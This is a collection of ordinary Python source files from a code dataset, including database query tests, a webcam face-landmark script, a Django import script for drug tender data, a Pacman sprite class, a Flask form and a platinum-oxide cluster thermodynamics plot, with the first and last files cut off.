[temp1]\r\n feat_list[1] += [temp2]\r\n data[config.MAX_SAME_NUM] = feat_list[0]\r\n data[config.SEC_MAX_SAME_NUM] = feat_list[1]\r\n return data\r\n","sub_path":"modules/feature_engineering/heuristic_features.py","file_name":"heuristic_features.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"430857072","text":"\"\"\"Tests for queries.py using pytest.\"\"\"\n# pylint: disable=redefined-outer-name\n\nimport json\nfrom os.path import dirname\n\nimport pytest\nfrom pymongo.errors import ServerSelectionTimeoutError\n\nfrom minedatabase import databases, queries\n\nfrom minedatabase.databases import MINE\n\n\n@pytest.fixture()\ndef test_db():\n \"\"\"Create a test MINE database. Created and torn down before and after each\n test it is used in.\"\"\"\n try:\n testdb = MINE(\"mongotest\")\n except ServerSelectionTimeoutError:\n print('No Mongo DB server detected')\n yield testdb\n\n\n@pytest.fixture()\ndef test_molfile():\n \"\"\"Mol file for glucose compound.\"\"\"\n test_molfile = open(dirname(__file__) + \"/data/glucose.mol\", \"r\").read()\n return test_molfile\n\n\n@pytest.fixture()\ndef glucose():\n \"\"\"MongoDB document (.json) for glucose compound.\"\"\"\n with open(dirname(__file__) + '/data/glucose.json') as infile:\n glucose = json.load(infile)\n return glucose\n\n\n@pytest.fixture\ndef glucose_id():\n \"\"\"ID in MongoDB for glucose.\"\"\"\n glucose_id = {'_id': 'Ccffda1b2e82fcdb0e1e710cad4d5f70df7a5d74f'}\n return glucose_id\n\n\ndef test_quick_search(test_db, glucose, glucose_id):\n \"\"\"\n GIVEN a quick search query (e.g. glucose identifiers)\n WHEN quick search is used to search based on that query\n THEN make sure that quick search provides the correct results\n \"\"\"\n assert glucose not in queries.quick_search(test_db,\n 'WQZGKKKJIJFFOK-UHFFFAOYSA-N')\n assert glucose in queries.quick_search(\n test_db, 'InChIKey=WQZGKKKJIJFFOK-GASJEMHNSA-N')\n assert glucose in queries.quick_search(\n test_db, \"Ccffda1b2e82fcdb0e1e710cad4d5f70df7a5d74f\")\n assert glucose in queries.quick_search(test_db, \"917030\")\n assert glucose in queries.quick_search(test_db, \"cpd00027\")\n assert glucose in queries.quick_search(test_db, 'C00031')\n assert glucose in queries.quick_search(test_db, 'Glucose')\n assert glucose_id in queries.quick_search(\n test_db, 'WQZGKKKJIJFFOK-GASJEMHNSA-N', {'_id': 1})\n\n\ndef test_database_query(test_db, glucose, glucose_id):\n \"\"\"\n GIVEN an andvanced search query (e.g. a MINE id)\n WHEN advanced search is used to search based on that query\n THEN make sure that advanced search provides the correct results\n \"\"\"\n with pytest.raises(ValueError):\n queries.advanced_search(databases.MINE('admin'), \"{'MINE_id': 19160}\")\n with pytest.raises(ValueError):\n queries.advanced_search(test_db, \"\")\n assert queries.advanced_search(test_db, \"{'MINE_id': 917030}\") == [glucose]\n assert queries.advanced_search(test_db,\n \"{'Names': 'Glucose'}\") == [glucose]\n assert queries.advanced_search(test_db, \"{'MINE_id': 917030}\",\n {'_id': 1}) == [glucose_id]\n\n\ndef test_similarity_search(test_db, test_molfile, glucose):\n \"\"\"\n GIVEN a similary search query\n WHEN similarity search is used to search based on that query\n THEN make sure the similarity search provides the correct results\n \"\"\"\n assert len(queries.similarity_search(\n test_db, 'Cc1cc2c(cc1C)N(CC(O)C(O)C(O)COP(=O)(O)OP(=O)(O)OCC1OC(n3cn'\n 'c4c(N)ncnc43)C(O)C1O)c1nc(O)nc(O)c1N2', 0.9, 100)) == 8\n result = queries.similarity_search(test_db, test_molfile, 0.5, 100,\n fp_type='MACCS')\n assert glucose in result\n assert len(result) == 3\n\n\ndef test_substructure_search(test_db, glucose):\n \"\"\"\n GIVEN a substructure search query\n WHEN substructure search is used to search based on that query\n THEN make sure that substructure search provides the correct results\n \"\"\"\n result = queries.substructure_search(test_db, \"CO\", 100)\n assert glucose in result\n assert len(result) == 22\n result = queries.substructure_search(test_db, 'O=P(O)(O)O', 100)\n assert len(result) == 15\n assert isinstance(result[0], dict)\n\n\ndef test_structure_search(test_db, test_molfile, glucose):\n \"\"\"\n GIVEN a structure search query\n WHEN structure search is used to search based on that query\n THEN make sure that structure search provides the correct results\n \"\"\"\n assert glucose in queries.structure_search(\n test_db, 'OC[C@H]1OC(O)[C@H](O)[C@@H](O)[C@@H]1O', True)\n assert glucose in queries.structure_search(test_db, test_molfile, False)\n","sub_path":"tests/test_queries.py","file_name":"test_queries.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"599930019","text":"import numpy as np\nimport cv2\nfrom mtcnn.mtcnn import MTCNN\n\ndetector = MTCNN()\nvideo_capture = cv2.VideoCapture(0)\nwhile True:\n # Capture frame-by-frame\n ret, frame = video_capture.read()\n frame = cv2.flip(frame, 1)\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n result = detector.detect_faces(image)\n\n # Result is an array with all the bounding boxes detected.\n bounding_box = result[0]['box']\n keypoints = result[0]['keypoints']\n cv2.rectangle(frame,\n (bounding_box[0], bounding_box[1]),\n (bounding_box[0]+bounding_box[2], bounding_box[1] + bounding_box[3]),\n (0,155,255),\n 2)\n cv2.circle(frame,(keypoints['left_eye']), 3, (0,155,255), 2)\n cv2.circle(frame,(keypoints['right_eye']), 2, (0,155,255), 2)\n cv2.circle(frame,(keypoints['nose']), 3, (0,155,255), 2)\n cv2.circle(frame,(keypoints['mouth_left']), 3, (0,155,255), 2)\n cv2.circle(frame,(keypoints['mouth_right']), 3, (0,155,255), 2)\n\n cv2.line(frame,(keypoints['left_eye']),keypoints['right_eye'], (0,0,255), 1)\n cv2.line(frame,(keypoints['left_eye']),keypoints['nose'], (0,255,0), 2)\n cv2.line(frame,(keypoints['right_eye']),keypoints['nose'], (255,0,0), 2)\n \n dX = keypoints['right_eye'][0] - keypoints['left_eye'][0]\n dY = keypoints['right_eye'][1] - keypoints['left_eye'][1]\n dist_norm = np.sqrt((dX ** 2) + (dY ** 2))\n \n dX = keypoints['left_eye'][0] - keypoints['nose'][0]\n dY = keypoints['left_eye'][1] - keypoints['nose'][1]\n dist_left = np.sqrt((dX ** 2) + (dY ** 2))\n\n dX = keypoints['right_eye'][0] - keypoints['nose'][0]\n dY = keypoints['right_eye'][1] - keypoints['nose'][1]\n dist_right = np.sqrt((dX ** 2) + (dY ** 2))\n\n # Normalized Features-distances\n input_left = dist_left/dist_norm\n input_right = dist_right/dist_norm\n\n cv2.putText(frame, str(input_left), (50,50), \n cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), lineType=cv2.LINE_AA) \n cv2.putText(frame, str(input_right), (50,100), \n cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 0, 0), lineType=cv2.LINE_AA)\n \n print('FRAME')\n print(input_left)\n print(input_right)\n \n #print(result)\n\n # Display the resulting frame\n cv2.imshow('Video', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n# When everything is done, release the capture\nvideo_capture.release()\ncv2.destroyAllWindows()","sub_path":"PYTHON/Projects/faceRecognitions/itwork/jdscbj2/Pack2.py","file_name":"Pack2.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"287997191","text":"#!/usr/bin/env python\nimport os\nimport time\nfrom sqlalchemy import create_engine\nimport pandas as pd\nimport django\nimport datetime\nimport math\nimport numpy as np\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"datasite.settings\")\ndjango.setup()\n\nfrom chpa_data.views import *\nfrom vbp.models import *\nfrom rdpac.models import *\n\nengine = create_engine(\"mssql+pymssql://(local)/CHPA_1806\")\ntable = \"data\"\n\nD_BOOLEAN = {\"是\": True, \"否\": False}\n\n\ndef importModel(dict):\n for key in dict:\n sql = \"SELECT Distinct \" + key + \" FROM \" + table\n df = pd.read_sql(sql=sql, con=engine)\n df.dropna(inplace=True)\n print(df)\n l = []\n for item in df.values:\n l.append(dict[key](name=item[0]))\n\n dict[key].objects.all().delete()\n dict[key].objects.bulk_create(l)\n\n\n\"\"\"以下部分为vbp导入模块\"\"\"\n\n\ndef import_tender():\n df = pd.read_excel(\"vbp.xlsx\", sheet_name=\"第四轮集采\", header=0)\n df = df.drop_duplicates(\"药品通用名\")\n # pivoted = pd.pivot_table(df, index='药品通用名', values='最高限价', aggfunc=np.mean)\n # d = pivoted.to_dict()['最高限价']\n\n l = []\n for tender in df.values:\n print(tender)\n tender_begin = datetime.datetime.strptime(\"01-05-2021\", \"%d-%m-%Y\")\n l.append(\n Tender(\n target=tender[1],\n vol=\"第四轮45品种\",\n tender_begin=tender_begin,\n ceiling_price=tender[9],\n )\n )\n\n Tender.objects.bulk_create(l)\n\n\ndef import_volume():\n df = pd.read_excel(\"vbp_amount.xlsx\", sheet_name=\"第四轮集采 by 省\")\n # df = df[df[\"品种\"] != \"碳酸氢钠口服常释剂型\"]\n print(df)\n\n l = []\n for volume in df.values:\n print(volume)\n l.append(\n Volume(\n tender=Tender.objects.get(target=volume[1]),\n region=volume[0],\n spec=volume[2],\n amount_reported=volume[3],\n )\n )\n\n Volume.objects.bulk_create(l)\n\n\ndef import_bid():\n df = pd.read_excel(\"vbp.xlsx\", sheet_name=\"第四轮集采\", header=0)\n df.fillna(\"-\", inplace=True)\n print(df)\n\n tenders = Tender.objects.all()\n for tender in tenders:\n for bid in df.values:\n tender_name = bid[1]\n multi_spec = bid[2]\n spec = bid[3]\n company_full_name = bid[4]\n company_abbr_name = bid[5]\n origin = bid[6]\n mnc_or_local = bid[7]\n original_price = bid[10]\n bid_price = bid[11]\n region_win = bid[12]\n\n if tender_name == tender.target:\n if Company.objects.filter(full_name=company_full_name).exists():\n company = Company.objects.get(full_name=company_full_name)\n else:\n company = Company.objects.create(\n full_name=company_full_name,\n abbr_name=company_abbr_name,\n mnc_or_local=D_BOOLEAN[mnc_or_local],\n )\n if original_price == \"-\":\n bid_obj = Bid.objects.create(\n tender=tender,\n bidder=company,\n origin=D_BOOLEAN[origin],\n bid_spec=spec,\n bid_price=bid_price,\n )\n else:\n bid_obj = Bid.objects.create(\n tender=tender,\n bidder=company,\n origin=D_BOOLEAN[origin],\n bid_spec=spec,\n bid_price=bid_price,\n original_price=original_price,\n )\n\n if region_win != \"-\":\n list_region = [x.strip() for x in region_win.split(\",\")]\n for region in list_region:\n volume_objs = Volume.objects.filter(\n tender__target=tender_name, region=region,\n )\n for obj in volume_objs:\n obj.winner = bid_obj\n obj.save()\n\n # l = []\n # for tender in tenders:\n # l.append(Record(tender=tender, real_or_sim=True))\n\n # Record.objects.bulk_create(l)\n\n\ndef update_tender():\n tenders = Tender.objects.all()\n tender_begin = datetime.datetime.strptime(\"01-11-2020\", \"%d-%m-%Y\")\n for tender in tenders:\n if tender.vol == \"第三轮56品种\":\n tender.tender_begin = tender_begin\n tender.save()\n print(tender_begin)\n\n\n\"\"\"以下部分为rdpac导入模块\"\"\"\n\n\ndef import_company():\n df = pd.read_excel(\"rdpac.xlsx\", sheet_name=\"summary\", header=0)\n df = df.drop_duplicates(\"Company Name_CN\")\n # pivoted = pd.pivot_table(df, index='药品通用名', values='最高限价', aggfunc=np.mean)\n # d = pivoted.to_dict()['最高限价']\n\n l = []\n for company in df.values:\n print(company)\n l.append(\n Company(\n name_cn=company[1],\n name_en=company[2],\n abbr=company[0],\n country_code=company[3],\n )\n )\n\n Company.objects.all().delete()\n Company.objects.bulk_create(l)\n\n\ndef import_drug():\n df = pd.read_excel(\"rdpac.xlsx\", sheet_name=\"summary\", header=0)\n df.fillna(\"\", inplace=True)\n df = df.drop_duplicates(\"Product Name-RDPAC\")\n\n l = []\n for drug in df.values:\n print(drug)\n l.append(\n Drug(\n molecule_cn=drug[6],\n molecule_en=drug[7],\n product_name_cn=drug[5],\n product_name_en=drug[4],\n )\n )\n\n Drug.objects.all().delete()\n Drug.objects.bulk_create(l)\n\n\ndef import_sales():\n df = pd.read_excel(\"rdpac.xlsx\", sheet_name=\"summary\", header=0)\n \n Sales.objects.all().delete()\n \n start_col = 15\n for sale in df.values:\n print(sale)\n for j in range(8):\n company = Company.objects.get(name_cn=sale[1])\n drug = Drug.objects.get(product_name_en=sale[4])\n \n if math.isnan(sale[start_col+j]) is False:\n sale_obj = Sales.objects.create(\n company = company,\n drug = drug,\n year = df.columns[start_col+j],\n netsales_value = sale[start_col+j]\n )\n \n # tenders = Tender.objects.all()\n # for tender in tenders:\n # for bid in df.values:\n # tender_name = bid[1]\n # multi_spec = bid[2]\n # spec = bid[3]\n # company_full_name = bid[4]\n # company_abbr_name = bid[5]\n # origin = bid[6]\n # mnc_or_local = bid[7]\n # original_price = bid[10]\n # bid_price = bid[11]\n # region_win = bid[12]\n\n # if tender_name == tender.target:\n # if Company.objects.filter(full_name=company_full_name).exists():\n # company = Company.objects.get(full_name=company_full_name)\n # else:\n # company = Company.objects.create(\n # full_name=company_full_name,\n # abbr_name=company_abbr_name,\n # mnc_or_local=D_BOOLEAN[mnc_or_local],\n # )\n # if original_price == \"-\":\n # bid_obj = Bid.objects.create(\n # tender=tender,\n # bidder=company,\n # origin=D_BOOLEAN[origin],\n # bid_spec=spec,\n # bid_price=bid_price,\n # )\n # else:\n # bid_obj = Bid.objects.create(\n # tender=tender,\n # bidder=company,\n # origin=D_BOOLEAN[origin],\n # bid_spec=spec,\n # bid_price=bid_price,\n # original_price=original_price,\n # )\n\n # if region_win != \"-\":\n # list_region = [x.strip() for x in region_win.split(\",\")]\n # for region in list_region:\n # volume_objs = Volume.objects.filter(\n # tender__target=tender_name, region=region,\n # )\n # for obj in volume_objs:\n # obj.winner = bid_obj\n # obj.save()\n\n # l = []\n # for tender in tenders:\n # l.append(Record(tender=tender, real_or_sim=True))\n\n # Record.objects.bulk_create(l)\n \n \nif __name__ == \"__main__\":\n # importModel(D_MODEL)\n # import_tender()\n # import_volume()\n # import_bid()\n # update_tender()\n # import_company()\n import_drug()\n import_sales()\n print(\"Done!\", time.process_time())\n # print(Drug.objects.get(pk=2248).product_name_cn)","sub_path":"import_django.py","file_name":"import_django.py","file_ext":"py","file_size_in_byte":9175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"37467124","text":"# Check if a large number is divisible by 4 or not\n# Given a number, the task is to check if a number is divisible by 4 or not.\n# The input number may be large and it may not be possible to store even if we use long long int.\n\ndef DivisibleBy4(n):\n\n cnt=0\n lst=[]\n\n while cnt<2:\n rem=n%10\n lst.append(str(rem))\n cnt=cnt+1\n n=n//10\n\n lst.reverse()\n\n if int(''.join(lst))%4==0:\n return True\n else:\n return False\n\ndef main():\n\n n=1124\n print(DivisibleBy4(n))\n\n n = 76952\n print(DivisibleBy4(n))\n\n n = 1234567589333862\n print(DivisibleBy4(n))\n\n n = 363588395960667043875487\n print(DivisibleBy4(n))\n\nif __name__=='__main__':\n main()","sub_path":"python/CodingExercises/DivisibleBy4.py","file_name":"DivisibleBy4.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"618779579","text":"\"\"\"\n HAL-9000 for Python is a Software PA\n Copyright (C) 2015 Rory Buchanan\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n\"\"\"\n\n\nfrom searching import *\nfrom name import *\nfrom miscfunc import *\nfrom config import *\n\n\ndef init():\n print(\"Loading... \")\n is_search_hist()\n start()\n nom()\n print(\"Initialisation Successful\")\n input(\"Press enter to continue...\")\n startwrite()\n n = 0\n while n is 0:\n okgo()\n\n\ndef isfunc(n):\n test_1 = 0\n while test_1 is 0:\n try:\n eval(n)()\n except NameError:\n return 0\n else:\n test_1 += 1\n return 1\n\n\ndef okgo():\n c = 0\n while c is 0:\n x = input(\"What Now? \")\n if x == '':\n print(\"NOT A VALID FUNCTION!\")\n elif isfunc(x) is 1:\n eval(x)\n c = 1\n else:\n print(\"NOT A VALID FUNCTION!\")\n","sub_path":"HAL-9000/HAL9000/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"299048564","text":"import obspython as obs\nfrom obs_change_notifier import OBSChangeNotifier\n\nclient = OBSChangeNotifier(\n obs=obs,\n watched_source='Camera A',\n base_url='http://localhost:4567/repeater',\n debug_heartbeats=True\n )\n\ndef script_description():\n global client\n\n return \"Tally light management for \" + client.watched_source\n\ndef script_load(settings):\n global client\n\n client.connect('source_activate', '?key=A&value=GREEN')\n client.connect('source_deactivate', '?key=A&value=RED')\n client.set_current('?key=A&value=RED')\n\ndef script_unload():\n global client\n\n client.set_current('?key=A&value=RED')\n","sub_path":"camera_a_tally_light.py","file_name":"camera_a_tally_light.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"182761110","text":"import pygame\n\nfrom pygame.locals import *\n\nclass Pacman(pygame.sprite.Sprite):\n \n def __init__(self, x, y, speed, collisions):\n # Call the parent class constructor\n pygame.sprite.Sprite.__init__(self)\n \n # Get the main window's display\n self.surface = pygame.display.get_surface()\n \n # Set animation frames\n self.frames = [ '../../sprites/pacman.png',\n '../../sprites/pacman-2.png',\n '../../sprites/pacman-3.png',\n '../../sprites/pacman-2.png',\n ]\n \n # Used to determine which frame the animation is in\n # Therefore, the index can go as far as 3 before resetting back to zero\n # if the movement were continuous\n self.index = 0\n \n # This dictionary contains the possible direction keywords\n # Each keyword points to the correct orientation of the image\n self.directions = { 'U': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 90),\n 'D': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 270),\n 'L': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 180),\n 'R': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 0),\n }\n \n # Keep history of the last movement made\n # lastMove can be 'U' | 'D' | 'L' | 'R'\n # Pacman starts looking right, so \"R\" is the initial value\n self.lastMove = 'R'\n \n # Will become true if one of the movement variables are true\n self.isMoving = False\n \n # Get the sprite and set the x+y coordinates\n self.image = self.directions[self.lastMove]\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n \n # Setting the pixels per loop of the sprite\n self.speed = speed\n \n # Set the collisions for Pacman\n self.collisions = collisions\n \n def update(self, moveUp, moveDown, moveLeft, moveRight):\n\n list_of_movement = [moveLeft, moveRight, moveDown, moveUp]\n \n if list_of_movement.count(True) > 0:\n self.isMoving = True\n else:\n self.isMoving = False\n \n # if Pacman is moving, continue looping through the animation frames\n if self.isMoving:\n self.index += 1\n if self.index is len(self.frames):\n self.index = 0\n else:\n self.index = 0\n \n if moveUp:\n self.rect.top -= self.speed\n if not pygame.sprite.spritecollide(self, self.collisions, False):\n self.lastMove = 'U'\n else:\n self.rect.top += self.speed\n self.index = 0\n \n if moveDown:\n self.rect.bottom += self.speed\n if not pygame.sprite.spritecollide(self, self.collisions, False):\n self.lastMove = 'D'\n else:\n self.rect.bottom -= self.speed\n self.index = 0\n \n if moveLeft:\n self.rect.left -= self.speed\n if not pygame.sprite.spritecollide(self, self.collisions, False):\n self.lastMove = 'L'\n else:\n self.rect.left += self.speed\n self.index = 0\n \n if moveRight:\n self.rect.right += self.speed\n if not pygame.sprite.spritecollide(self, self.collisions, False):\n self.lastMove = 'R'\n else:\n self.rect.right -= self.speed\n self.index = 0\n \n # Directions is called again to update the image based on index\n self.directions = { 'U': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 90),\n 'D': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 270),\n 'L': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 180),\n 'R': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 0),\n }\n \n # Update image\n self.image = self.directions[self.lastMove]\n ","sub_path":"tests/12 - Point System (in Level)/Pacman.py","file_name":"Pacman.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"216753934","text":"import sys\nsys.path.append('.')\nfrom . import *\n\nclass E0800Responses(FlaskForm):\n\tresponse = SelectField(\n\t\t'''Did the resident reject evaluation or care \n\t\t(e.g., bloodwork, taking medications, ADL assistance) \n\t\tthat is necessary to achieve the resident's goals for health and well-being? \n\t\tDo not include behaviors that have already been addressed \n\t\t(e.g., by discussion or care planning with the resident or family), \n\t\tand determined to be consistent with resident values, preferences, or goals.''',\n\t\tchoices=[\n\t\t('-1', 'Please select one'),\n\t\t('00', 'Behavior not exhibited.'),\n\t\t('01', 'Behavior of this type occurred 1 to 3 days.'),\n\t\t('02', 'Behavior of this type occurred 4 to 6 days, but less than daily.'),\n\t\t('03', 'Behavior of this type occurred daily.')\n\t\t],\n\t\tvalidators=[InputRequired()])\n\nclass E0800Form(FlaskForm):\n\tsection = 'Section_E'\n\tname = 'e0800'\n\tquestion = 'Rejection of Care - Presence & Frequency'\n\tresponses = FormField(E0800Responses)\n\tsubmit = SubmitField(\"Submit\")","sub_path":"app/main/forms/section_e/e0800_form.py","file_name":"e0800_form.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"606513093","text":"from ase.vibrations import Infrared\nfrom ase.vibrations import Vibrations\nfrom ase.thermochemistry import IdealGasThermo\nfrom ase.io import read,write\nimport matplotlib.pyplot as plt\nfrom gpaw import GPAW, FermiDirac, PoissonSolver, Mixer,PW\nfrom ase.calculators.vasp import Vasp\nfrom matplotlib.pyplot import *\nimport numpy as np\nimport os\n\n#constants\nkB=8.61733*10**-5 # eV/K\nT = 600 # K\np0 =1.01325 * 1e3 # bar\n#all the GO structures\nO2 = read('O2_molecule_DFTrelaxed_kpts221_spinpolarisedcal.traj')\nPt7 = read('Pt7_Al2O3_DFTrelaxed_GMplanar.traj')\nPt7_O2 = read('Pt7O2_Al2O3_GMDFTrelaxed.traj')\nPt7_2O2 = read('Pt7O4_Al2O3_GMDFTrelaxed.traj')\nPt7_3O2 = read('Pt7O6_Al2O3_GMDFTrelaxed.traj')\nPt7_4O2 = read('Pt7O8_Al2O3_GMDFTrelaxed.traj')\nPt7_5O2 = read('Pt7O10_Al2O3_GMDFTrelaxed.traj')\nPt7_6O2 = read('Pt7O12_Al2O3_GMDFTrelaxed.traj')\nPt7_7O2 = read('Pt7O14_Al2O3_GMDFTrelaxed.traj')\n#Pt7_8O2 = read('Pt7O16_Al2O3_GMDFTrelaxed.traj')\n\nga_stru =[Pt7_O2,Pt7_2O2,Pt7_3O2,Pt7_4O2,Pt7_5O2,Pt7_6O2,Pt7_7O2]\n\nN_O = [2,4,6,8,10,12,14]\nOxygen_correct = -0.5\n# energies of structures\nE_O2 = O2.get_potential_energy()\nE_Pt7 = Pt7.get_potential_energy()\nE_Pt7O2 = Pt7_O2.get_potential_energy()\nE_Pt72O2 = Pt7_2O2.get_potential_energy()\nE_Pt73O2 = Pt7_3O2.get_potential_energy()\nE_Pt74O2 = Pt7_4O2.get_potential_energy()\nE_Pt75O2 = Pt7_5O2.get_potential_energy()\nE_Pt76O2 = Pt7_6O2.get_potential_energy()\nE_Pt77O2 = Pt7_7O2.get_potential_energy()\n#E_Pt78O2 = Pt7_8O2.get_potential_energy()\n###########################################\nGs_slab ={}\ncolors = {}\n#color_lib = ['#377eb8','#4daf4a','#984ea3','#a65628','#ffff33']\ncolor_lib = ['#377eb8','#4daf4a','#984ea3','#a65628','#999999','#FF0000', '#ff7f00','#ffff33']\nprint(color_lib)\nresolution = 300\nalpha_back =0.70\nalpha_front =1.0\n\nfor i,atoms in enumerate(ga_stru):\n e = atoms.get_potential_energy()\n Gs_slab[i] = e\n colors[i] = color_lib[i]\n# vibrational frequency calculations\ncalc = GPAW(mode=PW(500),xc='PBE',\n spinpol=True,\n kpts=(2,2,1),\n symmetry={'point_group': False},\n basis='dzp')\nO2.set_calculator(calc)\nO2vib = Infrared(O2)\n#print(O2vib)\n#O2vib.run()\n#O2vib.summary()\ne_O2vib = O2vib.get_energies()\n#print(e_O2vib)\n\nthermo = IdealGasThermo(vib_energies=e_O2vib,\n atoms=O2,\n geometry='linear',\n symmetrynumber=2, spin=1)\n\n#print(e_O2vib)\ndef get_mu(T,p):\n G = thermo.get_gibbs_energy(temperature=T, pressure=p0, verbose=False)\n #print(p0,T)\n mu0 = 0.5*G\n mu = mu0 + 0.5*kB*T*np.log(p / (1.01325 * 1e3))\n # print(T,p,np.log(p / (1.01325 * 1e3)),mu)\n return mu\n\n\ndef get_required_deltaG_atmup(i,mu):\n G = delta_E[i]-N_O[i]*mu\n #print(i,G,delta_E[i])\n return G\n\n\ndef get_lowest_e(mu):\n lowest_e = 1000000000000000.000\n lowest_N = None\n for i in range(0,len(N_O)):\n #print(get_required_deltaG_atmup(i,mu))\n if get_required_deltaG_atmup(i,mu) <= lowest_e:\n lowest_e = get_required_deltaG_atmup(i,mu)\n lowest_N = i\n #print(lowest_N,lowest_e)\n return [lowest_N,lowest_e]\n\ndef get_lowest_e_pt(mu):\n lowest_e = 100000000000000000.000\n lowest_N = None\n for i in range(0,len(N_O)):\n if get_required_deltaG_atmup(i,mu) <= lowest_e:\n lowest_e = get_required_deltaG_atmup(i,mu)\n N =N_O[i]\n lowest_N = N\n return [lowest_N,lowest_e]\n\n\ndef get_highest_e(mu):\n highest_e = -100000000.00\n highest_N = None\n for i in range(0,len(N_O)):\n if get_required_deltaG_atmup(i,mu) >= highest_e :\n highest_e = get_required_deltaG_atmup(i,mu)\n lowest_N = i\n return [highest_N,highest_e]\n\ndef get_highest_e_pt(mu):\n highest_e = -100000000.00\n highest_N = None\n for i in range(0,len(N_O)):\n if get_required_deltaG_atmup(i,mu) >= highest_e :\n highest_e = get_required_deltaG_atmup(i,mu)\n N =N_O[i]\n lowest_N = N\n return [highest_N,highest_e]\n \n\nps = np.power(10,[-30.,-28.,-26.,-24.,-22.,-20.,-18.,-16.,-14.,-12.,-10.,-8.,-6.,-4.,-2.,0.,2.,4.,6.,8.,10.,12.,14.,16., 18.,20.,22.,24.,26.,28.,30.])\n#print(ps)\n#exit()\nmu_p = [get_mu(T,p) for p in ps]\nprint(mu_p)\ndelta_E =np.zeros(len(ga_stru))\nfor i,atoms in enumerate(ga_stru):\n delta_E[i] = (ga_stru[i].get_potential_energy() - E_Pt7-(N_O[i]*0.5*E_O2)) \n # print(delta_E[i])\n\n#fig, ax = plt.subplots()\nfig = figure(figsize=(10,5))\nax1 = fig.add_subplot(121)\n\ndelta_G =np.zeros([len(ga_stru),len(mu_p)])\nax1.plot(mu_p,delta_G[0,:],'-',color='#ffff33',label='Pt$_{7}$O$_0$',zorder=2)\nfor i in range(len(ga_stru)):\n for j in range(len(mu_p)):\n delta_G[i,j] = delta_E[i]-N_O[i]*mu_p[j]\n print(delta_G[i,j])\n ax1.plot(mu_p, delta_G[i,:],'-',color=colors[i],label='Pt$_{7}$O$_{'+str(N_O[i])+'}$',zorder=2)\n # print(delta_G[i,:])\n\n#xlims =[min(mu_p),max(mu_p)]\nxlims =[-2.23,0.0]\nprint(xlims)\nax1.set_xlim(xlims)\n# Lowest line and fill\n#ylims = [get_lowest_e(mu_p[0])[1]*1.1,get_highest_e(mu_p[-1])[1]*1.1]\nylims =[-16.0,10.0]\nax1.set_ylim(ylims)\n#print(ylims)\nxticks([-2.0,-1.5,-1.0,-0.5,0.0],[r'-2.0','-1.5','-1.0','-0.5','0.0'])\nyticks([-16.0,-14.0,-12.0,-10.0,-8.0,-6.0,-4.0,-2.0,0.0,2.0,4.0,6.0,8.0,10.0],['-16.0','-14.0','-12.0','-10.0','-8.0','-6.0','-4.0','-2.0','0.0','2.0','4.0','6.0','8.0','10.0'])\n\nmu_first = mu_p[0]\n#print(mu_first)\n#print(np.linspace(mu_p[0],mu_p[-1]+1e-10, 200))\nfor mu_last in np.linspace(mu_p[0],mu_p[-1]+1e-10, 200):\n off = 0.\n if get_lowest_e(mu_first)[0] != get_lowest_e(mu_last)[0] or mu_last > mu_p[-1]:\n if mu_first > -1.:\n off = 0.01\n #print(mu_first)\n ax1.plot([mu_first+off, mu_last], [get_lowest_e(mu_first)[1], get_lowest_e(mu_last)[1]],\n '-', lw=4, color=colors[get_lowest_e(mu_first)[0]], alpha=alpha_front, zorder=3)\n ax1.fill_between([mu_first, mu_last],[ylims[-1], ylims[-1]], [ylims[0],ylims[0]], lw=0.,\n color=colors[get_lowest_e(mu_first)[0]], alpha=alpha_back, zorder=1)\n mu_first = mu_last\n\nax1.legend(loc='upper right', frameon=False)\nax1.set_xlabel(r'$\\Delta \\mu_\\mathrm{O}(T,p)$ (eV)')\nax1.set_ylabel(r'$\\Delta G$ (eV)')\nax1.set_title('(a) Free energy diagram at 600 K Temp.')\n# p-T diagram\nax2 = fig.add_subplot(122)\nT_range = np.linspace(100, 1200, resolution)\np_range = np.power(10,np.linspace(-24, 30, resolution))\nz = np.zeros((len(T_range), len(p_range)))\nmu_z = np.zeros((len(T_range), len(p_range)))\n\nlevels = []\nlevels1 = []\nfor i,T in enumerate(T_range):\n for j,p in enumerate(p_range):\n mu_z[i][j] = get_mu(T,p)\n 